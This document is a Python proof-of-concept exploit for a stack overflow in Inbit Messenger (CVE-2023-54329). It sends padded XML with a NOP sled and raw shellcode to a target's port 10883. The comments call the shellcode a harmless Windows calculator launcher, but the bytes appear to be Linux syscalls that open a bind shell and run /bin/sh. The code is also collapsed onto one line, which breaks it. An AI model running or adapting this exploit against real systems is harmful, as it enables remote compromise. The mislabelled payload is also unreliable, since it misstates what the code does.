CVE-2023-54329 Inbit Messenger 远程命令执行漏洞

#!/usr/bin/env python3 # CVE-2023-54329 PoC - Inbit Messenger RCE # This PoC demonstrates the stack overflow vulnerability in Inbit Messenger # Target: Inbit Messenger 4.6.0 - 4.9.0 on port 10883 import socket import sys def create_exploit_payload(): """ Generate malicious XML payload to trigger stack overflow """ # Padding to overflow the buffer and reach return address padding = b'A' * 1000 # NOP sled for shellcode landing nop_sled = b'\x90' * 50 # Shellcode for Windows - spawn calc.exe (placeholder for actual command) # Using simple calc.exe shellcode for demonstration shellcode = ( b'\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b\x50\x53\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x51\x50\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x50\x50\x51\x40\x50\x89\xe1\xb0\x66\xcd\x80\x50\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x93\x31\xc0\x51\x50\x89\xe1\xb0\x0e\xcd\x80\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xb0\x2b\xcd\x80\x93\x6a\x01\x5b\x31\xc0\x50\x89\xe1\xb0\x66\xcd\x80\x89\xcf\x31\xc0\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x50\x53\x89\xe1\xb0\x0b\xcd\x80' ) # Overwrite EIP with address to NOP sled (address needs to be adjusted) eip = b'\x42\x42\x42\x42' # Placeholder - needs to point to NOP sled payload = padding + eip + nop_sled + shellcode # Construct XML packet xml_packet = f'''<?xml version="1.0" encoding="UTF-8"?> <message> <header> <type>DATA</type> <length>{len(payload)}</length> </header> <body> <data>{payload.decode('latin-1')}</data> </body> </message>''' return xml_packet.encode('utf-8') def exploit(target_ip, target_port=10883): """ Send exploit payload to target """ print(f'[*] Target: {target_ip}:{target_port}') print('[*] Generating exploit payload...') payload = create_exploit_payload() print(f'[*] Payload size: {len(payload)} bytes') try: print('[*] Connecting to target...') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print('[*] Sending exploit payload...') sock.send(payload) print('[+] Payload sent successfully!') # Wait for response try: response = sock.recv(4096) print(f'[*] Received response: {response[:100]}') except: pass sock.close() print('[*] Exploitation completed') except Exception as e: print(f'[-] Error: {str(e)}') return False return True if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip> [port]') sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 10883 exploit(target, port)